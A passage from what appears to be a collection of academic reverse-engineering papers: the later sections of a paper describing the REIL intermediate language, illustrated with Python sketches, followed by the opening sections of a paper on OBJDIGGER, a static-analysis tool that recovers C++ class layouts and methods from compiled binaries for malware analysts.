The explicit handling of overflows is an important difference from real architectures, where overflows produced by operations are nearly always cut off because of the fixed size of native CPU registers. This explicit overflow handling is what enables REIL algorithms to analyze the results of operations in greater detail when the exact overflowing value of a register is important, instead of merely having a flag that signals that an operation produced an overflow.

2.2 The bitwise instructions

The next biggest instruction group is formed by the three bitwise instructions.
•AND: Bitwise AND of two values
•OR: Bitwise OR of two values
•XOR: Bitwise XOR of two values

The three bitwise instructions work exactly as one expects bitwise instructions to work. Bit for bit, they combine the bits of the two input operands according to the truth table defined for their operation. The calculated value is then written to the output operand of the instruction.

A bitwise NOT instruction is not part of the REIL instruction set because NOT is equivalent to XOR-ing a value with a value of equal size that has all bits set. That means that to calculate the one's complement of the 16-bit value 0x1234 one would XOR it with the 16-bit value 0xFFFF.

(Footnote 3: The result operand of addition and subtraction is technically too large, because these operations performed on two 32-bit values can only overflow into the 33rd bit; however, there is no 33-bit REIL operand size, so the next biggest operand size (64 bits) was chosen.)

AND t0/b4, t1/b4, t2/b4
OR t7/b4, t9/b4, t12/b4
XOR t8/b4, 4/b4, t9/b4

Figure 2: Examples of the bitwise REIL instructions

Figure 2 shows examples of all bitwise instructions. Their general structure equals that of the arithmetic instructions: like them, bitwise instructions take two input operands and store the result of the operation in the output operand. One important difference is that none of the bitwise instructions produce an overflow. Explicit modeling of overflowing values and an extension of the size of the output operand are therefore not necessary.

2.3 Data transfer instructions

To access the REIL memory, two different REIL instructions are needed: one is used for loading a value of arbitrary size from the REIL memory, while the other one is used to store a value of arbitrary size to the REIL memory. Furthermore, this group of instructions contains an instruction that is used to transfer values into registers.
•LDM: Load a value from memory
•STM: Store a value to memory
•STR: Store a value in a register

The first operand of the LDM instruction contains the address of the REIL memory where the value is loaded from. This operand can be either an integer literal or a register. When the instruction is executed, it loads the value from the given memory address and stores it in the third operand of the instruction. The size of the value that is loaded from memory equals the size of the third operand: if the third operand is a 32-bit register, a 32-bit value is loaded from memory. As the loaded value is written to the third operand, the third operand must be a register.

The store operation STM is the inverse of the load operation LDM. It can be used to store a value of arbitrary size to memory. The first operand of the STM instruction is the value to be stored in memory; its size determines how many bytes are written to memory when the STM instruction is executed. The third operand specifies the address where the value of the first operand is written to. Both operands can be either integer literals or registers. The second operand is unused.

The STR instruction is one of the simplest instructions of the REIL instruction set. It copies a value to the output register specified in the instruction. The input operand can be either a literal (to load a register with a constant) or another register (to transfer the contents of one register to another register).

LDM 413800/b4, , t1/b2
STR t1/b2, , t2/b2
STM t2/b2, , 415280/b4

Figure 3: Examples of the data transfer REIL instructions

Figure 3 shows a sequence of data transfer instructions that load a value from memory, copy it to another register, and store it back to another address in memory. Since the size of the output register of an LDM instruction specifies how many bytes are loaded from memory, it is clear that two bytes are loaded from memory.
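The semantics of these instructions can be sketched with a small byte-addressable memory model. This is our own illustration: the class and method names are invented, and REIL itself leaves byte order to the translators (see the endianness discussion in section 3), so the little-endian layout below is an assumption.

```python
# Toy flat REIL memory; STM/LDM are modeled with an assumed little-endian layout.
class ReilMemory:
    def __init__(self):
        self.data = {}                        # sparse memory starting at address 0

    def stm(self, value, size_bytes, address):
        """STM: the first operand (value) is written to memory at the address."""
        for i in range(size_bytes):
            self.data[address + i] = (value >> (8 * i)) & 0xFF

    def ldm(self, address, size_bytes):
        """LDM: the output operand's size decides how many bytes are read."""
        return sum(self.data.get(address + i, 0) << (8 * i)
                   for i in range(size_bytes))

# The Figure 3 sequence: load two bytes, copy them (STR), store them back.
mem = ReilMemory()
mem.stm(0xBEEF, 2, 0x413800)     # pretend 0xBEEF already lives at 413800
t1 = mem.ldm(0x413800, 2)        # LDM 413800/b4, , t1/b2
t2 = t1                          # STR t1/b2, , t2/b2
mem.stm(t2, 2, 0x415280)         # STM t2/b2, , 415280/b4
assert mem.ldm(0x415280, 2) == 0xBEEF
```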
The sizes of the two used operands of an STR instruction are typically the same, as STR only copies a value. In the end the two-byte register t2 is stored back to memory.

2.4 Conditional instructions

The group of conditional instructions is used to compare values and, depending on the result of the comparison, to jump to one REIL instruction or another.

•BISZ: Compare a value to zero
•JCC: Conditional jump

The BISZ instruction is the only instruction of the REIL instruction set that can be used to compare values. In fact, it can only compare a single value to zero, but this is sufficient to emulate any kind of more complex comparison. The BISZ instruction takes a single operand and compares it to zero; depending on the value of the input operand, the output operand is set to 0 (if the value of the input operand was not 0) or 1 (if the value of the input operand was 0).

The conditional jump instruction JCC is typically used to process the result of a BISZ instruction. If the first operand of the JCC instruction evaluates to 0, the jump is not taken. If the first operand evaluates to any value other than zero, the jump is taken and control is transferred to the address (or sub-address) specified in the third operand. An unconditional jump is not part of the REIL instruction set because it can be emulated with a conditional jump by setting the first operand of the conditional jump to the integer literal 1 (or any other non-zero integer literal).

BISZ t0/b4, , t1/b1
JCC t1/b1, , 401000/b4

Figure 4: Examples of the conditional REIL instructions

Figure 4 shows a typical sequence of a single BISZ instruction followed by a JCC instruction that uses the output of the BISZ instruction to determine whether to take a jump to the address specified in its third operand. Since the output of a BISZ instruction is always either 0 or 1, the size of the output operand of BISZ instructions is always b1.
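One way BISZ and JCC can emulate a richer comparison can be sketched in Python. This is our own decomposition of an equality test into SUB, BISZ, and JCC, not actual translator output, and the function names are invented:

```python
# Emulating "jump if a == b" with SUB + BISZ + JCC, as a toy interpreter might.
def bisz(value: int) -> int:
    return 1 if value == 0 else 0          # BISZ: output operand is always b1

def jump_if_equal(a: int, b: int) -> bool:
    diff = (a - b) & ((1 << 64) - 1)       # SUB a, b, t0 (double-width result)
    cond = bisz(diff)                      # BISZ t0, , t1
    return cond != 0                       # JCC t1, , target: taken iff nonzero

assert jump_if_equal(5, 5) is True
assert jump_if_equal(5, 7) is False
```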
2.5 Other instructions

There are a few other instructions which do not really belong to any group at all.

•UNDEF: Undefines a value
•UNKN: Unknown source instruction
•NOP: No operation

The UNDEF instruction undefines the value of a register. This means that once the UNDEF instruction is executed, the value inside the undefined register is unknown. This is important because there are native assembly instructions which leave registers or flags in an undefined state. The x86 instruction DIV, for example, leaves a number of flags like the zero flag and the carry flag in an undefined state.

The UNKN instruction is a kind of placeholder instruction. It indicates that during the REIL code generation an original assembly instruction was encountered that could not be translated.

The NOP instruction does nothing. Nevertheless it is not useless: REIL translators can generate this instruction to pad control flow in certain edge cases. In a few situations this is very useful because it keeps REIL translators very simple. Without the NOP instruction, a REIL translator would have to look ahead to the next native instruction to generate correct REIL code (see footnote 4).

UNDEF , , t1/b4
UNKN , ,
NOP , ,

Figure 5: Examples of other REIL instructions

Figure 5 shows examples of the remaining REIL instructions. The only instruction that takes operands is the UNDEF instruction, which undefines a register.

3. THE REIL ARCHITECTURE

The definition of the REIL language includes the description of the REIL architecture and the definition of a virtual machine that can be used to execute the generated REIL code.

The REIL architecture is a simple register-based architecture without an explicit stack. The number of registers available in REIL code is unlimited. As previously explained, the names of REIL registers have the form tn. The index number of register names is unbounded.
Furthermore, there is no requirement that all REIL registers between t0 and t(n-1) are used by a given program that uses n different registers. A program that uses exactly three REIL registers can use t7, t799, and t3199 if desired.

REIL registers themselves do not have a fixed or limited width. The size of a REIL register is always equal to the size of the operands where it is used, and can even change between instructions: in one instruction register tn can have size bs while in another instruction it can have size bt. Since operands can grow arbitrarily large, REIL registers can also grow arbitrarily large. In practice we have not yet encountered registers with more than 128 bits (equivalent to b16), though.

We already mentioned that registers of the original input code can appear in REIL code. In fact, the registers of the original architecture will always appear in REIL code to make it possible to port results of REIL code analysis back to the original code. This does not violate the platform-independent nature of REIL code. REIL registers and native registers can be mixed at will and treated completely uniformly; while analyzing REIL code there is no difference between the registers t0, t1, and t2 and the registers eax, ebx, and ecx. At the end of an analysis algorithm one can then easily distinguish between the REIL registers (which have the tn form) and the native registers (which do not) to port the values of relevant registers back to the original assembly code.

(Footnote 4: Technically, the NOP instruction could of course be replaced by an instruction like ADD 0, 0, tn that also has no discernible effect on the program state.)

The memory of the virtual REIL machine follows a flat memory model. Unlike some real CPUs like the x86, which has memory segments (in real mode) or at least memory selectors (in protected mode), REIL memory starts at address 0 and can grow arbitrarily large.
While there is technically an infinite amount of storage available in REIL memory, practical concerns of the source architecture limit the memory used in practice. If the source assembly language (like 32-bit x86 assembly) can only address 4 GB of memory, only 4 GB of REIL memory will ever be accessed in REIL code created from x86 programs. REIL memory above the addressable memory range of the source architecture is never used.

Due to the flat memory model of the REIL memory, segmented memory access of native architectures must be simulated in REIL programs if necessary. This can be done by creating virtual segments which represent the memory segments of the native architecture. Since REIL memory is not limited in size, there is enough space available to make these virtual segments non-overlapping, meaning that memory access through one segment of the native architecture never interferes with memory access through another segment of the native architecture.

The endianness of the source architecture must also be considered when accessing REIL memory. On native architectures, endianness falls into two categories: in some cases (like x86) the architecture has a fixed endianness that cannot be changed at runtime, while other architectures (PowerPC, ARM) can switch the endianness of their memory accesses at runtime by executing a special instruction. In general, REIL does not have any mechanism to deal with endianness. All endianness issues must be handled by the REIL translators when generating the REIL instructions that access memory. This poses a problem when endianness is switched at runtime, because REIL code is generated in advance and cannot be updated anymore when the endianness switch happens. However, the rarity of endianness switching makes this a special situation that is seldom relevant for security audits.
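How a translator might bake endianness into the generated memory accesses can be sketched as follows. The decomposition of a multi-byte store into per-byte stores is our own illustration of the idea, with invented names; it is not actual translator output:

```python
# Byte order is fixed at translation time: the same 2-byte store yields
# differently ordered per-byte stores depending on the source architecture.
def split_store(value, address, size_bytes, big_endian):
    body = [(value >> (8 * i)) & 0xFF for i in range(size_bytes)]  # LE order
    if big_endian:
        body.reverse()
    return [(address + i, byte) for i, byte in enumerate(body)]

# x86-style (little-endian) vs. big-endian placement of 0x1234 at 0x1000
assert split_store(0x1234, 0x1000, 2, big_endian=False) == [(0x1000, 0x34), (0x1001, 0x12)]
assert split_store(0x1234, 0x1000, 2, big_endian=True) == [(0x1000, 0x12), (0x1001, 0x34)]
```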
After the REIL memory and the REIL registers are given an initial state, REIL code can be analyzed or even executed. Execution of REIL code happens just like program execution on a real CPU. Starting with the value in the program counter register, REIL code is executed. (There is no special REIL program counter register; rather, the program counter register of the input architecture is used. This is important to make sure that at each step of the REIL code analysis, the program counter register has the same value it would have during a real execution of the program on the source platform.) The REIL instruction at the position of the current program counter is fetched and interpreted with regard to the current state of the REIL register bank and the REIL memory. Once interpretation is complete, the REIL register bank and the REIL memory are updated to reflect the effects of the instruction on the global state.

4. TRANSLATING NATIVE CODE TO REIL

The translation of native assembly code to REIL code is straightforward. For each supported native assembly language there is a so-called REIL translator. This REIL translator takes a piece of native assembly code and translates it to REIL code. Iterating linearly over all instructions in a piece of input code, the translator translates each instruction to REIL code independently. The REIL translator does not look ahead to see what instruction follows the current instruction, and it does not require information generated during the translation of previous instructions. This statelessness of the translation makes REIL translators very simple. In fact, REIL translators are nothing but glorified maps that repeatedly map a single native instruction to a list of REIL instructions.

Due to the simplicity of REIL instructions and what they can do in one step, a single native assembly instruction is nearly always translated to many REIL instructions.
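The "glorified map" character of a translator can be sketched as follows. The per-mnemonic rules below are simplified inventions for illustration only; a real x86 translator emits considerably more REIL code per instruction, for example for all affected flags:

```python
# A stateless toy translator: each native instruction maps independently
# to a list of REIL instructions; no look-ahead, no translation history.
def translate_insn(insn):
    mnemonic, _, rest = insn.partition(" ")
    operands = [o.strip() for o in rest.split(",")] if rest else []
    rules = {
        "xor": lambda ops: [f"XOR {ops[0]}, {ops[1]}, t0",
                            f"STR t0, , {ops[0]}",
                            f"BISZ t0, , ZF"],     # one flag effect made explicit
        "nop": lambda ops: ["NOP , ,"],
    }
    return rules[mnemonic](operands)

def translate(code):
    reil = []
    for insn in code:
        reil.extend(translate_insn(insn))          # purely linear iteration
    return reil

assert translate(["xor eax, ebx", "nop"]) == [
    "XOR eax, ebx, t0", "STR t0, , eax", "BISZ t0, , ZF", "NOP , ,"]
```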
Experimental results have shown that, on average, an original instruction is translated into approximately 20 REIL instructions, while the most complex native instruction we found in practice was translated to more than 50 REIL instructions.

This one-to-many relation between native instructions and REIL instructions unfortunately destroys the direct correspondence between the address of a native assembly instruction and the addresses of the REIL instructions created for it. Having such a correspondence would be most desirable because it would make it significantly simpler to port the results of a REIL analysis algorithm back to the original assembly code. To solve this problem, the addresses of REIL instructions are shifted to the left by 8 bits (or multiplied by 0x100). This means that the first REIL instruction that corresponds to the native assembly instruction at offset n has the offset 0x100 * n, the second REIL instruction has the offset 0x100 * n + 1, and so on. This address translation limits the translation of a single native instruction to at most 256 REIL instructions. Should it ever happen that more than 256 REIL instructions are generated for a single native instruction, the addresses of the REIL instructions would overflow into the addresses of the REIL instructions of the following native instruction.

5. LIMITATIONS OF REIL

There are a number of more or less significant issues that might limit the use of REIL in practice. Some of these limitations are built into the REIL language itself, while others exist simply because we have not yet had time to implement certain aspects of native architectures.

The first limitation is that the REIL translators we have so far (32-bit x86, 32-bit PowerPC, and 32-bit ARM) are unable to translate certain classes of instructions. For example, none of the translators can translate FPU instructions.
CPU extensions like the MMX and SSE extensions of x86 CPUs are also not translated yet. We have chosen to skip the translation of these instructions because REIL is supposed to be a language for analyzing assembly code for security-critical bugs and vulnerabilities, and FPU, MMX, and SSE instructions are only very rarely involved in these kinds of flaws. Should FPU bugs or other CPU extension bugs become popular targets of software exploits in the future, we can easily extend our existing translators to handle these instructions.

Like FPU instructions, privileged instructions such as system calls, interrupts, and other kernel-level instructions are not translated by our current REIL translators. The justification for the lack of support for these instructions follows along the lines of the lack of FPU support: in our initial implementation of REIL we wanted to focus on the instructions that are most often involved in security-relevant software flaws. Depending on the exact effects of the missing privileged instructions, adding them to the REIL language might be anywhere from trivial to impossible. An instruction that has significant low-level effects on the underlying hardware, for example one that flushes the CPU cache, will never be part of REIL, for this would mean a complete loss of platform independence and/or a big increase in the number of instruction mnemonics. Other privileged instructions like interrupt execution can often be simulated using the features REIL already has.

REIL also cannot deal with exceptions in a platform-independent way. This means that at this point exceptions and the corresponding stack unwinding cannot be handled by REIL. Due to the lack of exception handling, common situations that throw exceptions (dividing by zero, hitting a breakpoint, ...) are simply ignored in the default REIL interpreter.

The next limitation is that REIL cannot handle self-modifying code of any kind.
This is simply because native code is pre-translated instruction by instruction for a native function, and the resulting REIL code is fixed after the initial translation. REIL instructions themselves do not reside in the REIL memory; they can therefore not be overwritten and modified during the interpretation of REIL code.

6. THE FUTURE OF REIL

The first and foremost goal of the next few months is to write more REIL translators (for example, to translate MIPS code) and to implement more REIL-based code analysis algorithms. Additionally, we have a few minor ideas about improving the quality of generated REIL code and its usefulness in static code analysis.

The first idea is the introduction of a bit-sized operand type b0. Right now the smallest operand type is the byte-sized operand b1. During bit-width analysis it might be useful to know that an operand that has size b1 in the current code uses no bits other than its least significant bit. Extending on this idea, it might be smarter to give the size of operands in bits instead of bytes.

An idea that could improve the correctness of REIL translation and of certain analysis algorithms is the introduction of two additional instructions, extend and reduce. The motivation for these two instructions is simple. Right now there are no limitations on how operand sizes can be combined in one instruction: when generating an ADD instruction, one input operand can have size b1 while the second input operand has size b4. A rule specifying that the input operands of all instructions must be of equal size would make REIL code more regular for analysis, and certain bug classes in REIL translators could be checked for automatically. The role of the extend instruction would be to extend a value of a smaller size like b1 to a larger size like b2 or b4 while keeping the value of the extended register the same. The reduce instruction would be the opposite of the extend instruction.
Reduce would shrink an operand to a smaller operand size. In this case it cannot be guaranteed that the value of the reduced register equals the value of the original register; in many situations overflowing high bits will be truncated and lost. This is perfectly acceptable, though, because such truncation is already used in many different situations, for example when writing the 33-bit-wide result of an addition of two 32-bit values back to a 32-bit register. Right now this truncation is done using an AND instruction; in the future the reduce instruction might make things semantically clearer.

The number of operand types might also be increased in the future. As soon as FPU instructions are supported by the REIL translators, it will be necessary to add single-precision and double-precision FPU operands. Another example concerns certain architectures like PowerPC, where registers can be addressed not by name but by an index into the register bank. These instructions cannot be translated to REIL yet because REIL does not know an operand type like "register index".

7. RELATED WORK

The use of intermediate languages for code analysis is nothing new. In fact, all serious compilers use some kind of intermediate language during the optimization phase of their code generation (see GCC, for example). Creating intermediate representations of disassembled assembly code in the context of security analysis is not nearly as widespread. Nevertheless, there are a few noteworthy approaches.

At the hack.lu conference 2008, Mihai Chiriac of the anti-virus software company BitDefender presented an intermediate language that he used to speed up the emulation of obfuscated malware programs [1]. The intermediate language he presented is structurally close to REIL: like REIL, his language has a very reduced instruction set where every instruction has exactly one effect on the global state.
Furthermore, his virtual architecture has an infinite number of virtual registers and a fully emulated memory.

An open-source implementation of an intermediate language specifically made for reverse engineering and statically analyzing binary code is the ELIR language of the ERESI project (http://www.eresi-project.org). Like REIL, the goal of the ELIR intermediate language is simplified platform-independent reasoning about assembly code by providing an intermediate language that makes the effects of all native assembly operations explicit. An overview of the ELIR language was given in Julien Vanegue's EKOPARTY 2008 talk "Static binary analysis with a domain specific language" [2].

A commercial use of intermediate language recovery from disassembled code in the context of security analysis is IDA Pro and Hex-Rays. IDA Pro is the industry-standard disassembler for many platforms, and Hex-Rays is a decompiler plugin for IDA Pro. The Hex-Rays decompiler uses an intermediate language representation (IR) of the underlying disassembled code to analyze and optimize the disassembled code and to decompile it into a C-style high-level language. As shown in Ilfak Guilfanov's Black Hat 2008 presentation "Decompilers and Beyond" [3][4], the intermediate representation used by Hex-Rays is significantly different from REIL. There are more instructions in the Hex-Rays IR, and they do not obey the single-responsibility rule for avoiding side effects. Other differences include the distinction between integer literals and pointers to code, which is present in the Hex-Rays IR but not in REIL, and features like the option to address basic blocks instead of addresses in jump instructions. Another striking difference, visible directly when looking at code snippets of REIL and the Hex-Rays IR, is that REIL uses far more temporary registers to translate a typical piece of code.
Another implementation of an intermediate language was created by GrammaTech in their CodeSurfer/x86 product. While it is not publicly available at this point, several whitepapers have been released about CodeSurfer/x86 (for example, see [5] or [6]). Unfortunately, these whitepapers focus on the results of certain static analysis algorithms implemented with CodeSurfer/x86 rather than on its intermediate language, so it is unclear at this point how similar that language is to REIL.

As part of AbsInt, an analysis framework specifically suited for statically analyzing embedded system code, Saarland University developed the intermediate language CRL2. Like REIL, CRL2 is generated by transforming the assembly code of a disassembled input program. Nevertheless, the similarities to REIL end at this point: CRL2 was specifically developed for detailed control flow analysis, and as a result CRL2 code is very complex due to a large number of annotations that are relevant for control flow. Examples of generated CRL2 code can be found at [7].

8. CONCLUSIONS

Using the information presented in this paper it is possible to write a complete implementation of the Reverse Engineering Intermediate Language REIL that can be used for static code analysis of disassembled assembly code. We have already created a commercial implementation of REIL in our product BinNavi and have successfully written several simple static code analysis algorithms. Thanks to REIL, these algorithms work platform-independently on x86, PowerPC, and ARM code.

9. REFERENCES

[1] Mihai G. Chiriac. Anti Virus 2.0 - Compilers in disguise. hack.lu, October 2008.
[2] Julien Vanegue. Static binary analysis with a domain specific language. EKOPARTY 2008, October 2008.
[3] Ilfak Guilfanov. Decompilers and beyond. Black Hat USA 2008, August 2008.
[4] Ilfak Guilfanov. Decompilers and beyond - Whitepaper. Black Hat USA 2008, August 2008.
[5] Gogul Balakrishnan, Radu Gruian, Thomas Reps, and Tim Teitelbaum.
CodeSurfer/x86 - a platform for analyzing x86 executables. In Lecture Notes in Computer Science, pages 250-254. Springer, 2005.
[6] T. Reps, G. Balakrishnan, J. Lim, and T. Teitelbaum. A next-generation platform for analyzing executables. In APLAS, pages 212-229, 2005.
[7] AbsInt Angewandte Informatik GmbH. CRL Version 2 Manual.

Recovering C++ Objects From Binaries Using Inter-Procedural Data-Flow Analysis

Wesley Jin, CMU, wesleyj@andrew.cmu.edu
Cory Cohen, CERT, cfc@cert.org
Jeffrey Gennari, CERT, jsg@cert.org
Charles Hines, CERT, hines@cert.org
Sagar Chaki, SEI, chaki@sei.cmu.edu
Arie Gurfinkel, SEI, arie@sei.cmu.edu
Jeffrey Havrilla, CERT, jsh@cert.org
Priya Narasimhan, CMU, priya@cs.cmu.edu

Abstract

Object-oriented programming complicates the already difficult task of reverse engineering software, and is being used increasingly by malware authors. Unlike with traditional procedural-style code, reverse engineers must understand the complex interactions between object-oriented methods and the shared data structures with which they operate, a tedious manual process.

In this paper, we present a static approach that uses symbolic execution and inter-procedural data flow analysis to discover object instances, data members, and methods of a common class. The key idea behind our work is to track the propagation and usage of a unique object instance reference, called a this pointer. Our goal is to help malware reverse engineers understand how classes are laid out and to identify their methods. We have implemented our approach in a tool called OBJDIGGER, which produced encouraging results when validated on real-world malware samples.

1. Introduction

As malware grows in sophistication, analysts and reverse engineers are increasingly encountering samples written in code following the object-oriented (OO) programming model. For those tasked with analyzing these programs, recovering class information is an essential but painstaking process.
Analysts are often forced to resort to slow, manual analysis of a large number of methods and data structures.

Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than the author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from permissions@acm.org. PPREW '14, January 25, 2014, San Diego, CA, US. Copyright is held by the owner/author(s). Publication rights licensed to ACM. ACM 978-1-4503-2649-0/14/01... $15.00. http://dx.doi.org/10.1145/2556464.2556465

Programs that follow a traditional, procedural programming model are typically arranged around functions with well-defined boundaries, inputs, and outputs. They use structures that support limited operations with simple relationships (e.g., C-style structs). The clear relationships between procedures make it relatively easy to recover control and data flow even after compilation.

Conversely, the OO programming model is organized around data structures (i.e., C++ objects) with complex relationships and interactions. While C++ data structures are easily recognizable in source code, compilation hides them behind sets of methods with no obvious organization or relevance to one another. Therefore, to reverse engineer an OO program, analysts must: (1) determine the related methods that belong to the same class; and (2) understand how they interact.
To facilitate the recovery of object structures and relationships, we have developed an approach that leverages the use of the "this pointer" (hereafter ThisPtr), a reference assigned to each unique (up to allocation instruction address) object instance. Specifically, we use symbolic execution [11] and static inter-procedural data-flow analysis [9] to track the propagation and usage of individual ThisPtr values between and within functions. Although previous authors, most notably Fokin et al. [7][6] and Sabanal et al. [18], have used ThisPtr tracking for OO reverse engineering purposes, our work is distinct for two reasons:

1) We document heuristics for identifying object-oriented methods and structures expressed as data-flow patterns, which can be detected in an automated way. Although patterns may vary from compiler to compiler or from one object to another, the key idea is that each variant can be captured as a unique pattern.

2) Our approach relies only on static analysis and symbolic execution. Thus, it has the ability to recover object-oriented artifacts that may not be created during execution.

We have implemented our approach on top of the ROSE analysis framework [15][17]. ROSE provides an infrastructure for disassembly, symbolic execution, control flow analysis, and data flow analysis. Our tool, OBJDIGGER, aggregates data from object instances created throughout a binary compiled with Microsoft's Visual Studio C++ (MSVC). It records potential constructors, data members, and methods. Tests against open-source programs compiled with MSVC, and against real-world malware samples, indicate that we are able to recover this information reasonably accurately. Although our current implementation is specific to MSVC, our approach could be extended to other compilers as well.
In summary, the contributions of this paper are:
•We present a purely static approach that uses symbolic execution and inter-procedural data-flow analysis to track object references in binaries produced by MSVC.
•We provide an implementation capable of analyzing a binary and producing a list of (1) potential constructors or builders; (2) methods; and (3) data members.
•We present techniques for detecting inheritance relationships and embedded objects.
•We demonstrate, through experimentation on both open-source programs and closed-source malware, that the techniques described in this paper can be practically applied to reverse engineering OO code.

The remainder of this paper is organized as follows. In Sec. 2, we provide a brief overview of C++ object internals. In Sec. 3, we formalize our goals and constraints. In Sec. 4, we provide definitions for data structures crucial to our approach. In Sec. 5, we describe our approach. In Sec. 6, we describe experiments conducted using our implementation. In Sec. 6.1.2, we describe limitations of our current work and our plans to address them in the future. In Sec. 7, we review related work. In Sec. 8, we conclude.

2. Implementing Object-Oriented C++ Features
In this section, we provide a basic overview of object-oriented C++ concepts. For a more detailed discussion, we direct interested readers to Gray [8]. Although this paper focuses on code following MSVC's __thiscall convention, objects produced by other compilers follow similar patterns. Our discussion focuses on the example presented in Fig. 1.

When objects are created, the compiler allocates space in memory for each class instance. The amount of space allocated is based on the number and size of data members, plus possible padding for alignment. Fig. 2 illustrates the layout of this memory region for Sub, Add, and Add1, as generated1 by MSVC.
Every instantiated object is referenced by a pointer to its start in memory; this reference is commonly referred to as the ThisPtr. The ThisPtr is maintained for the lifetime of the object. It is passed amongst methods, and is used for data member accesses and to make virtual function calls. For example, suppose that tPtr is a ThisPtr to an instance of Add1. The memory dereference [tPtr+12] points at the variable one (see Fig. 2), and [tPtr+8] points at the embedded Sub object inherited from Add.

Only one instance of a function is created by a compiler. However, many instances of a C++ class may exist. Therefore, the ThisPtr allows for operations on the data members within a particular object instance. In MSVC, the ThisPtr is typically passed as a hidden parameter to OO functions via the ECX register in accordance with the __thiscall calling convention (more on this later). For example, the sum() method, depicted in Fig. 3, implements the __thiscall calling convention. At 0x401120, the ThisPtr is retrieved from ECX. At 0x40112A, the immediate value 1 is moved into the memory location corresponding to the ThisPtr plus 12. This memory location corresponds to the offset of the Add1 class member variable one. Therefore, the instruction at 0x40112A corresponds to the high-level assignment one=1.

Inheritance manifests in memory layouts by embedding an object of each superclass inside the object of the subclass (see Fig. 2).

1 This output is generated using the -d1reportAllClassLayout flag.

class Sub {
private:
    int c;
public:
    int sub(int a, int b) { c = a - b; return c; }
};

class Add {
protected:
    int x;
    int y;
    Sub b;
public:
    Add() { x = 0; y = 0; }
    Add(int q, int e) { x = q; y = e; }
    int sum() { return x + y; }
    int sub() { return b.sub(x, y); }
};

class Add1 : public Add {
public:
    int one;
    int sum() { one = 1; return x + one; }
    Add1(int q) { x = q; }
};

Figure 1. Object-oriented code sample.
Dereferences to parent data members consist of addresses composed of the ThisPtr plus offsets into the parent and child objects. For example, to access the class member variable Add::x from an Add1 object, Add1's ThisPtr is adjusted by an offset to refer to the embedded Add instance (zero in this case) and then dereferenced as needed.

Virtual functions are implemented using virtual function tables that contain a list of virtual function addresses. The address of a virtual function table is stored as an implicit data member at offset zero of the object (i.e., accessed by reading [thisPtr]). Indirect calls to virtual functions are made by dereferencing the virtual function table and calling the target virtual function. Fig. 4 illustrates a virtual function call to the second function in a virtual function table. At address 0x402300, the virtual function table's address is moved from offset zero of the class layout into EAX. At 0x402305, the pointer corresponding to the second function in the virtual function table is moved into EAX, which is called in the next instruction.

When an inheritance relationship exists, the child object overwrites the virtual function table references of its parent (if it has one) on instantiation to ensure that the most specific virtual function table is installed at runtime. If there are multiple parents with virtual functions, the child object has multiple references to distinct virtual function tables, one per parent. In this arrangement, references to virtual function tables are placed at the beginning of each embedded parent object.

class Sub size(4):
 +---
 0 | c
 +---
class Add size(12):
 +---
 0 | x
 4 | y
 8 | Sub b
 +---
class Add1 size(16):
 +---
   | +--- (base class Add)
 0 | | x
 4 | | y
 8 | | Sub b
   | +---
12 | one
 +---
Figure 2. Class layouts for Sub, Add, and Add1.
0x401120: mov [esp+4], ecx
0x401125: mov eax, [esp+4]
0x40112A: mov dword ptr [eax+12], 1
0x401131: mov eax, [esp+4]
0x401136: mov eax, [eax]
0x401138: mov ecx, [esp+4]
0x40113D: add eax, [ecx+12]
0x401140: retn
Figure 3. Assembly code for sum() in Add1.

0x402300: mov eax, [ecx]
0x402305: mov eax, [eax+4]
0x40230A: call eax
Figure 4. Virtual function call example.

3. Problem Statement
Given a binary executable compiled from C++ source code without debugging information, recover the following:
•Unique constructors and builder methods for classes instantiated
•Methods associated with object instances
•The location and size of data members used in these methods

Goals and Assumptions. The goal of this work is to expedite the recovery of object-oriented structures in compiled executables. We aim to aid program understanding such that reverse engineers and malware analysts are able to quickly identify when objects and their data members are being used.

However, we do not seek to recover the original source code of classes, for two reasons. First, recovering source might not always be possible, because compilation is not an injective mapping: different sources can be compiled to produce the same binary, so identifying the original source code is impossible in general. Second, from the malware analyst's point of view, it is more important to understand the details of the compiled code (e.g., method relationships and class layouts) than high-level abstractions.

4. Definitions
In this section, we review basic definitions and abstractions from data-flow analysis, used in the next section. For additional information, we direct the reader to work by Kiss, Jász, and Gyimóthy [12].

A computer system can be defined as C = ⟨P, M, R⟩, where P is a program, and M and R are the memory locations and registers available for use by P. Each program is composed of a set of functions, F, which can be further divided into sequences of instructions (i.e., ∀f ∈ F, f = ⟨i0, i1, i2, ...⟩).
Let I be the set of instructions, and V the set of values they manipulate. Instructions read from and write to parts of M and R. Let Use : I → 2^(V×(M∪R)) be a mapping such that Use(i) is the set of all pairs ⟨v, a⟩, where v is a value read by i and a is either a memory address in M or a register in R that stores v:

Use(i) = { ⟨v, a⟩ | a ∈ M ∪ R, i reads v from a }

Simply stated, Use(i) is a data structure that maps instructions to the values read from particular registers and memory locations. Similarly, let Def : I → 2^(V×(M∪R)) be a mapping between an instruction and the locations it writes to:

Def(i) = { ⟨v, a⟩ | a ∈ M ∪ R, i writes v to a }

An instruction is said to depend on another instruction if it reads/uses a value that has been set by the other. We define the function DepOn to be a mapping between an instruction i and the set of triplets ⟨v, a, j⟩, where v is the value written to the register or memory location a by j:

DepOn(i) = { ⟨v, a, j⟩ | ⟨v, a⟩ ∈ Use(i) ∩ Def(j) }

Simply stated, DepOn adds to the data provided by Use by identifying the instruction responsible for defining the value that was read. Alternatively, the first instruction is said to be a dependent of the second. DepOf is the inverse of DepOn:

DepOf(j) = { ⟨v, a, i⟩ | ⟨v, a⟩ ∈ Use(i) ∩ Def(j) }

Finally, we define the notion of data-flow order. Consider a function X that calls three others, A, B, and C, such that B calls D just before returning. Furthermore, suppose that X passes each method the value v. Written in flow order, [A, B, D, C] implies that: 1) A, B, D, and C contain instructions that all use v (i.e., instructions in A, B, C, and D share a reaching definition of v); and 2) instructions in A dominate the instructions in B, D, and C; instructions in B dominate those in C and D; and so forth. (I.e., given a control-flow graph containing X, A, B, C, and D, and taking the first instruction in X as the starting node, every path from the start to the instructions in B, C, and D must go through the instructions in A.
Every path from the start to the instructions in C and D must go through those in A and B, and so forth.)

5. Approach
